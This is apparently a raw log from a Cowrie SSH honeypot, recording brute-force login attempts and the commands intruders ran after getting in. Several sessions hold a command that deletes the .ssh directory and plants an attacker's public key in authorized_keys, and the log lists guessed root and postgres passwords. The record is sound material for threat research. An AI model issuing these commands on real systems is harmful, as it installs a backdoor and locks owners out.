{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:22:38.114965Z","src_ip":"134.199.174.250","session":"47516991d617"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"admin123","message":"login attempt [postgres/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:22:39.138735Z","src_ip":"134.199.174.250","session":"47516991d617"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:40.497555Z","src_ip":"134.199.174.250","session":"47516991d617"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":47368,"dst_ip":"1.2.3.4","dst_port":22,"session":"543be8bd6e7f","protocol":"ssh","message":"New connection: 49.247.35.31:47368 (1.2.3.4:22) [session: 543be8bd6e7f]","sensor":"my-vps","timestamp":"2025-09-08T13:22:56.303571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:56.314555Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:56.595819Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33902,"dst_ip":"1.2.3.4","dst_port":22,"session":"8af80ff9db51","protocol":"ssh","message":"New connection: 212.227.235.229:33902 (1.2.3.4:22) [session: 8af80ff9db51]","sensor":"my-vps","timestamp":"2025-09-08T13:22:57.120497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:57.121485Z","src_ip":"212.227.235.229","session":"8af80ff9db51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:57.345177Z","src_ip":"212.227.235.229","session":"8af80ff9db51"}
{"eventid":"cowrie.login.success","username":"root","password":"Games!@#","message":"login attempt [root/Games!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:22:57.715380Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:22:58.292648Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:22:58.293447Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:22:58.294556Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"!","message":"login attempt [kafka/!] failed","sensor":"my-vps","timestamp":"2025-09-08T13:22:58.296292Z","src_ip":"212.227.235.229","session":"8af80ff9db51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:58.563445Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:22:59.224682Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.225552Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.504395Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.505346Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.520767Z","src_ip":"212.227.235.229","session":"8af80ff9db51"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":9450,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a9c1a59d4b3","protocol":"ssh","message":"New connection: 49.247.35.31:9450 (1.2.3.4:22) [session: 5a9c1a59d4b3]","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.793636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:59.797742Z","src_ip":"49.247.35.31","session":"5a9c1a59d4b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:23:00.094991Z","src_ip":"49.247.35.31","session":"5a9c1a59d4b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:23:01.260523Z","src_ip":"49.247.35.31","session":"5a9c1a59d4b3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:02.561749Z","src_ip":"49.247.35.31","session":"5a9c1a59d4b3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":46849,"dst_ip":"1.2.3.4","dst_port":22,"session":"49d16a7f14d2","protocol":"ssh","message":"New connection: 49.247.35.31:46849 (1.2.3.4:22) [session: 49d16a7f14d2]","sensor":"my-vps","timestamp":"2025-09-08T13:23:02.839578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:23:02.844686Z","src_ip":"49.247.35.31","session":"49d16a7f14d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:23:03.140516Z","src_ip":"49.247.35.31","session":"49d16a7f14d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:23:04.258626Z","src_ip":"49.247.35.31","session":"49d16a7f14d2"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:04.537021Z","src_ip":"49.247.35.31","session":"543be8bd6e7f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:04.537948Z","src_ip":"49.247.35.31","session":"49d16a7f14d2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59986,"dst_ip":"1.2.3.4","dst_port":22,"session":"26392b3f8ef8","protocol":"ssh","message":"New connection: 134.199.174.250:59986 (1.2.3.4:22) [session: 26392b3f8ef8]","sensor":"my-vps","timestamp":"2025-09-08T13:23:07.286240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:23:07.286895Z","src_ip":"134.199.174.250","session":"26392b3f8ef8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:23:07.704580Z","src_ip":"134.199.174.250","session":"26392b3f8ef8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234","message":"login attempt [postgres/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:23:08.602547Z","src_ip":"134.199.174.250","session":"26392b3f8ef8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:09.901743Z","src_ip":"134.199.174.250","session":"26392b3f8ef8"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53976,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6aa37f370cc","protocol":"ssh","message":"New connection: 134.199.174.250:53976 (1.2.3.4:22) [session: a6aa37f370cc]","sensor":"my-vps","timestamp":"2025-09-08T13:23:37.541908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:23:37.542965Z","src_ip":"134.199.174.250","session":"a6aa37f370cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:23:37.834083Z","src_ip":"134.199.174.250","session":"a6aa37f370cc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":50568,"dst_ip":"1.2.3.4","dst_port":22,"session":"03e66f411488","protocol":"ssh","message":"New connection: 139.59.14.27:50568 (1.2.3.4:22) [session: 03e66f411488]","sensor":"my-vps","timestamp":"2025-09-08T13:23:38.120963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:23:38.122012Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:23:38.469901Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:23:38.829904Z","src_ip":"134.199.174.250","session":"a6aa37f370cc"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd.1234","message":"login attempt [root/abcd.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:23:39.898289Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:40.244365Z","src_ip":"134.199.174.250","session":"a6aa37f370cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:23:40.656801Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:23:40.657475Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:23:40.658298Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:41.005534Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:23:41.731861Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 